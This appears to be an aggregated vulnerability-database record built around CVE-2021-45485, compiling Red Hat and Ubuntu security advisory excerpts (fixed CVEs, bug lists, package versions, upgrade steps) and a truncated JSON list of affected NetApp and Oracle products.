Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field (BZ# 2054954)
-
Changing the multiclusterhub name other than the default name keeps the version in the web console loading (BZ# 2059822)
-
search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade (BZ# 2065318)
-
Uninstall pod crashed when destroying Azure Gov cluster in ACM (BZ# 2073562)
-
Deprovisioned clusters not filtered out by discovery controller (BZ# 2075594)
-
When deleting a secret for a Helm application, duplicate errors show up in topology (BZ# 2075675)
-
Changing existing placement rules does not change YAML file Regression (BZ# 2075724)
-
Editing Helm Argo Applications does not Prune Old Resources (BZ# 2079906)
-
Failed to delete the requested resource [404] error appears after subscription is deleted and its placement rule is used in the second subscription (BZ# 2080713)
-
Typo in the logs when Deployable is updated in the subscription namespace (BZ# 2080960)
-
After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters (BZ# 2080716)
-
RHACM 2.4.5 images (BZ# 2081438)
-
Performance issue to get secret in claim-controller (BZ# 2081908)
-
Failed to provision openshift 4.10 on bare metal (BZ# 2094109)
-
Bugs fixed (https://bugzilla.redhat.com/):
1937078 - Trying to create a new cluster on vSphere and no feedback, stuck in "creating" 2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2051752 - Wrong message is displayed when GRC fails to connect to an ansible tower 2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account 2052702 - multicluster_operators_hub_subscription issues due to /tmp usage 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2054954 - Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field 2059822 - Changing the multiclusterhub name other than the default name keeps the version in the web console loading. 2065318 - search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2073562 - Uninstall pod crashed when destroying Azure Gov cluster in ACM 2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store 2075594 - Deprovisioned clusters not filtered out by discovery controller 2075675 - When deleting a secret for a Helm application, duplicate errors show up in topology 2075724 - Changing existing placement rules does not change YAML file 2079906 - Editing Helm Argo Applications does not Prune Old Resources 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2080713 - Failed to delete the requested resource [404] error appears after subscription is deleted and its placement rule is used in the second subscription [Upgrade] 2080716 - After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters 2080847 - CVE-2022-25645 dset: Prototype Pollution in dset 2080960 - Typo in the logs when Deployable is updated in the subscription namespace 2081438 - RHACM 2.4.5
images 2081908 - Performance issue to get secret in claim-controller 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group 2094109 - Failed to provision openshift 4.10 on bare metal
- See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.3/html/release_notes/
Security fixes:
-
node-fetch: exposure of sensitive information to an unauthorized actor (CVE-2022-0235)
-
follow-redirects: Exposure of Sensitive Information via Authorization Header leak (CVE-2022-0536)
-
nconf: Prototype pollution in memory store (CVE-2022-21803)
-
golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)
-
Moment.js: Path traversal in moment.locale (CVE-2022-24785)
-
golang: syscall: faccessat checks wrong group (CVE-2022-29526)
-
go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)
Bug fixes:
-
RHACM 2.3.11 images (BZ# 2082087)
-
Bugs fixed (https://bugzilla.redhat.com/):
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2082087 - RHACM 2.3.11 images 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
-
===================================================================== Red Hat Security Advisory
Synopsis: Important: kernel-rt security and bug fix update Advisory ID: RHSA-2022:1975-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:1975 Issue date: 2022-05-10 CVE Names: CVE-2020-0404 CVE-2020-13974 CVE-2020-27820 CVE-2021-0941 CVE-2021-3612 CVE-2021-3669 CVE-2021-3743 CVE-2021-3744 CVE-2021-3752 CVE-2021-3759 CVE-2021-3764 CVE-2021-3772 CVE-2021-3773 CVE-2021-4002 CVE-2021-4037 CVE-2021-4083 CVE-2021-4157 CVE-2021-4197 CVE-2021-4203 CVE-2021-20322 CVE-2021-26401 CVE-2021-29154 CVE-2021-37159 CVE-2021-41864 CVE-2021-42739 CVE-2021-43389 CVE-2021-43976 CVE-2021-44733 CVE-2021-45485 CVE-2021-45486 CVE-2022-0001 CVE-2022-0002 CVE-2022-0286 CVE-2022-0322 CVE-2022-1011 =====================================================================
- Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Real Time (v. 8) - x86_64 Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
- Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
-
kernel: fget: check that the fd still exists after getting a ref to it (CVE-2021-4083)
-
kernel: avoid cyclic entity chains due to malformed USB descriptors (CVE-2020-0404)
-
kernel: integer overflow in k_ascii() in drivers/tty/vt/keyboard.c (CVE-2020-13974)
-
kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free (CVE-2021-0941)
-
kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() (CVE-2021-3612)
-
kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts (CVE-2021-3669)
-
kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c (CVE-2021-3743)
-
kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() (CVE-2021-3744)
-
kernel: possible use-after-free in bluetooth module (CVE-2021-3752)
-
kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks (CVE-2021-3759)
-
kernel: DoS in ccp_run_aes_gcm_cmd() function (CVE-2021-3764)
-
kernel: sctp: Invalid chunks may be used to remotely remove existing associations (CVE-2021-3772)
-
kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients (CVE-2021-3773)
-
kernel: possible leak or corruption of data residing on hugetlbfs (CVE-2021-4002)
-
kernel: security regression for CVE-2018-13405 (CVE-2021-4037)
-
kernel: Buffer overwrite in decode_nfs_fh function (CVE-2021-4157)
-
kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)
-
kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)
-
kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies (CVE-2021-20322)
-
hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 (CVE-2021-26401)
-
kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation (CVE-2021-29154)
-
kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c (CVE-2021-37159)
-
kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write (CVE-2021-41864)
-
kernel: Heap buffer overflow in firedtv driver (CVE-2021-42739)
-
kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c (CVE-2021-43389)
-
kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device (CVE-2021-43976)
-
kernel: use-after-free in the TEE subsystem (CVE-2021-44733)
-
kernel: information leak in the IPv6 implementation (CVE-2021-45485)
-
kernel: information leak in the IPv4 implementation (CVE-2021-45486)
-
hw: cpu: intel: Branch History Injection (BHI) (CVE-2022-0001)
-
hw: cpu: intel: Intra-Mode BTI (CVE-2022-0002)
-
kernel: Local denial of service in bond_ipsec_add_sa (CVE-2022-0286)
-
kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c (CVE-2022-0322)
-
kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes (CVE-2022-1011)
-
kernel: use-after-free in nouveau kernel module (CVE-2020-27820)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.6 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
- Bugs fixed (https://bugzilla.redhat.com/):
1901726 - CVE-2020-27820 kernel: use-after-free in nouveau kernel module 1903578 - kernnel-rt-debug: do not call blocking ops when !TASK_RUNNING; state=1 set at [<0000000050e86018>] handle_userfault+0x530/0x1820 1905749 - kernel-rt-debug: BUG: sleeping function called from invalid context at kernel/locking/rtmutex.c:968 1919791 - CVE-2020-0404 kernel: avoid cyclic entity chains due to malformed USB descriptors 1946684 - CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation 1951739 - CVE-2021-42739 kernel: Heap buffer overflow in firedtv driver 1974079 - CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP() 1985353 - CVE-2021-37159 kernel: use-after-free in hso_free_net_device() in drivers/net/usb/hso.c 1986473 - CVE-2021-3669 kernel: reading /proc/sysvipc/shm does not scale with large shared memory segment counts 1997467 - CVE-2021-3764 kernel: DoS in ccp_run_aes_gcm_cmd() function 1997961 - CVE-2021-3743 kernel: out-of-bound Read in qrtr_endpoint_post in net/qrtr/qrtr.c 1999544 - CVE-2021-3752 kernel: possible use-after-free in bluetooth module 1999675 - CVE-2021-3759 kernel: unaccounted ipc objects in Linux kernel lead to breaking memcg limits and DoS attacks 2000627 - CVE-2021-3744 kernel: crypto: ccp - fix resource leaks in ccp_run_aes_gcm_cmd() 2000694 - CVE-2021-3772 kernel: sctp: Invalid chunks may be used to remotely remove existing associations 2004949 - CVE-2021-3773 kernel: lack of port sanity checking in natd and netfilter leads to exploit of OpenVPN clients 2010463 - CVE-2021-41864 kernel: eBPF multiplication integer overflow in prealloc_elems_and_freelist() in kernel/bpf/stackmap.c leads to out-of-bounds write 2013180 - CVE-2021-43389 kernel: an array-index-out-bounds in detach_capi_ctr in drivers/isdn/capi/kcapi.c 2014230 - CVE-2021-20322 kernel: new DNS Cache Poisoning Attack based on ICMP fragment needed packets replies 2016169 - CVE-2020-13974 kernel: integer overflow in 
k_ascii() in drivers/tty/vt/keyboard.c 2018205 - CVE-2021-0941 kernel: out-of-bounds read in bpf_skb_change_head() of filter.c due to a use-after-free 2025003 - CVE-2021-43976 kernel: mwifiex_usb_recv() in drivers/net/wireless/marvell/mwifiex/usb.c allows an attacker to cause DoS via crafted USB device 2025726 - CVE-2021-4002 kernel: possible leak or corruption of data residing on hugetlbfs 2027239 - CVE-2021-4037 kernel: security regression for CVE-2018-13405 2029923 - CVE-2021-4083 kernel: fget: check that the fd still exists after getting a ref to it 2030747 - CVE-2021-44733 kernel: use-after-free in the TEE subsystem 2034342 - CVE-2021-4157 kernel: Buffer overwrite in decode_nfs_fh function 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2037019 - CVE-2022-0286 kernel: Local denial of service in bond_ipsec_add_sa 2039911 - CVE-2021-45485 kernel: information leak in the IPv6 implementation 2039914 - CVE-2021-45486 kernel: information leak in the IPv4 implementation 2042822 - CVE-2022-0322 kernel: DoS in sctp_addto_chunk in net/sctp/sm_make_chunk.c 2061700 - CVE-2021-26401 hw: cpu: LFENCE/JMP Mitigation Update for CVE-2017-5715 2061712 - CVE-2022-0001 hw: cpu: intel: Branch History Injection (BHI) 2061721 - CVE-2022-0002 hw: cpu: intel: Intra-Mode BTI 2064855 - CVE-2022-1011 kernel: FUSE allows UAF reads of write() buffers, allowing theft of (partial) /etc/shadow hashes
- Package List:
Red Hat Enterprise Linux Real Time for NFV (v. 8):
Source: kernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm
x86_64: kernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-kvm-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm
Red Hat Enterprise Linux Real Time (v. 8):
Source: kernel-rt-4.18.0-372.9.1.rt7.166.el8.src.rpm
x86_64: kernel-rt-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-core-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-devel-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm kernel-rt-modules-extra-4.18.0-372.9.1.rt7.166.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc. -- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:
The Migration Toolkit for Containers (MTC) 1.6.5 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2006044 - CVE-2021-39293 golang: archive/zip: malformed archive may cause panic or memory exhaustion (incomplete fix of CVE-2021-33196) 2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2057579 - [MTC UI] Cancel button on ?Migrations? page does not disappear when migration gets Failed/Succeeded with warnings 2072311 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2074044 - [MTC] Rsync pods are not running as privileged 2074553 - Upstream Hook Runner image requires arguments be in a different order
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.39. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHBA-2022:7210
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Security Fix(es):
- go-getter: command injection vulnerability (CVE-2022-26945)
- go-getter: unsafe download (issue 1 of 3) (CVE-2022-30321)
- go-getter: unsafe download (issue 2 of 3) (CVE-2022-30322)
- go-getter: unsafe download (issue 3 of 3) (CVE-2022-30323)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-x86_64
The image digest is sha256:59d7ac85da072fea542d7c43498e764c72933e306117a105eac7bd5dda4e6bbe
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-s390x
The image digest is sha256:6b243bd6078b0a0e570c7bdf88a345f0c145009f929844f4c8ceb4dc828c0a7a
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-ppc64le
The image digest is sha256:e28554de454e8955fe72cd124fa9893e2c1761d39452e05610ec062d637baf2e
(For aarch64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.39-aarch64
The image digest is sha256:cc0860b33c3631ee3624cc280d796fb01ce8f802c5d7ecde8ef4010aad941dc0
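Each digest above identifies exactly one immutable release image, and the repository plus digest can be combined into a by-digest pullspec that registries resolve to a single manifest regardless of tag movement. A minimal sketch of that rewrite (the helper name is illustrative, not part of `oc`):

```python
def by_digest(pullspec: str, digest: str) -> str:
    """Rewrite a tag-based pullspec into an immutable by-digest reference.

    A registry resolves "repo@sha256:..." to exactly one manifest, so a
    by-digest reference is unaffected by a tag being moved later.
    """
    repo, _, _tag = pullspec.rpartition(":")  # drop the trailing tag
    return f"{repo}@{digest}"

# the x86_64 release listed above, pinned by its published digest
ref = by_digest(
    "quay.io/openshift-release-dev/ocp-release:4.10.39-x86_64",
    "sha256:59d7ac85da072fea542d7c43498e764c72933e306117a105eac7bd5dda4e6bbe",
)
```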
All OpenShift Container Platform 4.10 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
2092918 - CVE-2022-30321 go-getter: unsafe download (issue 1 of 3) 2092923 - CVE-2022-30322 go-getter: unsafe download (issue 2 of 3) 2092925 - CVE-2022-30323 go-getter: unsafe download (issue 3 of 3) 2092928 - CVE-2022-26945 go-getter: command injection vulnerability
- JIRA issues fixed (https://issues.jboss.org/):
OCPBUGS-1538 - Make northd probe interval default to 10 seconds OCPBUGS-1696 - All Nodes overview in console are showing "Something went wrong" OCPBUGS-2162 - Facing issue while configuring egress IP pool in OCP cluster which uses STS OCPBUGS-2171 - [4.10] cri-o should report the stage of container and pod creation it's stuck at OCPBUGS-2196 - Symptom Detection.Undiagnosed panic detected in pod OCPBUGS-2208 - [4.10] Dual stack cluster fails on installation when multi-path routing entries exist OCPBUGS-2448 - Downward API (annotations) is missing PCI information when using the tuning metaPlugin on SR-IOV Networks OCPBUGS-2464 - Add unit-test and gofmt support for ovn-kubernetes OCPBUGS-2523 - e2e tests: Installs Red Hat Integration - 3scale operator test is failing due to change of Operator name OCPBUGS-2546 - Remove policy/v1beta1 in 4.10 and later OCPBUGS-2553 - [release-4.10] member loses rights after some other user login in openid / group sync OCPBUGS-2607 - [release-4.10] go.mod should beworking with golang-1.17 and golang-1.18 OCPBUGS-2622 - CI: Backend unit tests fails because devfile registry was updated (mock response) OCPBUGS-2628 - Worker creation fails within provider networks (as primary and secondary) OCPBUGS-450 - KubeDaemonSetRolloutStuck alert using incorrect metric in 4.9 and 4.10 OCPBUGS-691 - [2112237] [ Cluster storage Operator 4.x(10/11) ] DefaultStorageClassController report fake message "No default StorageClass for this platform" on Alicloud, IBM, Nutanix
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
2094982 - CVE-2022-1996 go-restful: Authorization Bypass Through User-Controlled Key 2130218 - 4.9.7 containers
- ========================================================================== Ubuntu Security Notice USN-5299-1 February 22, 2022
linux, linux-aws, linux-kvm, linux-lts-xenial vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel. A physically proximate attacker could possibly use this issue to inject packets or exfiltrate selected fragments. (CVE-2020-26147)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly perform access control. An authenticated attacker could possibly use this to expose sensitive information. (CVE-2020-26558, CVE-2021-0129)
It was discovered that the RPA PCI Hotplug driver implementation in the Linux kernel did not properly handle device name writes via sysfs, leading to a buffer overflow. A privileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-33034)
Norbert Slusarek discovered that the CAN broadcast manger (bcm) protocol implementation in the Linux kernel did not properly initialize memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-34693)
马哲宇 discovered that the IEEE 1394 (Firewire) nosy packet sniffer driver in the Linux kernel did not properly perform reference counting in some situations, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-3483)
It was discovered that the bluetooth subsystem in the Linux kernel did not properly handle HCI device initialization failure, leading to a double-free vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-3564)
Murray McAllister discovered that the joystick device interface in the Linux kernel did not properly validate data passed via an ioctl(). A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code on systems with a joystick device registered. (CVE-2021-3612)
It was discovered that the tracing subsystem in the Linux kernel did not properly keep track of per-cpu ring buffer state. A privileged attacker could use this to cause a denial of service. (CVE-2021-3679)
It was discovered that the MAX-3421 host USB device driver in the Linux kernel did not properly handle device removal events. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2021-38204)
It was discovered that the 6pack network protocol driver in the Linux kernel did not properly perform validation checks. A privileged attacker could use this to cause a denial of service (system crash) or execute arbitrary code. (CVE-2021-42008)
Amit Klein discovered that the IPv6 implementation in the Linux kernel could disclose internal state in some situations. An attacker could possibly use this to expose sensitive information. (CVE-2021-45485)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM: linux-image-4.4.0-1100-kvm 4.4.0-1100.109 linux-image-4.4.0-1135-aws 4.4.0-1135.149 linux-image-4.4.0-219-generic 4.4.0-219.252 linux-image-4.4.0-219-lowlatency 4.4.0-219.252 linux-image-aws 4.4.0.1135.140 linux-image-generic 4.4.0.219.226 linux-image-kvm 4.4.0.1100.98 linux-image-lowlatency 4.4.0.219.226 linux-image-virtual 4.4.0.219.226
Ubuntu 14.04 ESM: linux-image-4.4.0-1099-aws 4.4.0-1099.104 linux-image-4.4.0-219-generic 4.4.0-219.252~14.04.1 linux-image-4.4.0-219-lowlatency 4.4.0-219.252~14.04.1 linux-image-aws 4.4.0.1099.97 linux-image-generic-lts-xenial 4.4.0.219.190 linux-image-lowlatency-lts-xenial 4.4.0.219.190 linux-image-virtual-lts-xenial 4.4.0.219.190
After a standard system update you need to reboot your computer to make all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.
References: https://ubuntu.com/security/notices/USN-5299-1 CVE-2020-26147, CVE-2020-26558, CVE-2021-0129, CVE-2021-28972, CVE-2021-33034, CVE-2021-34693, CVE-2021-3483, CVE-2021-3564, CVE-2021-3612, CVE-2021-3679, CVE-2021-38204, CVE-2021-42008, CVE-2021-45485
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fabric-attached storage 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire\\, enterprise sds \\\u0026 hci storage node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "aff a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "all flash fabric-attached storage 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fabric-attached storage a400",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire \\\u0026 hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "e-series santricity os controller",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h615c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core network exposure function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.13.3"
},
{
"_id": null,
"model": "fabric-attached storage 8300",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "all flash fabric-attached storage 8700",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci compute node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "communications cloud native core policy",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "e-series santricity os controller software",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller h300e",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "fas/aff baseboard management controller a400",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas/aff baseboard management controller 8700",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller h410c",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire enterprise sds \u0026 hci storage node",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire \u0026 hci management node",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "hci baseboard management controller h300s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fas/aff baseboard management controller 8300",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-017434"
},
{
"db": "NVD",
"id": "CVE-2021-45485"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "167602"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167072"
},
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
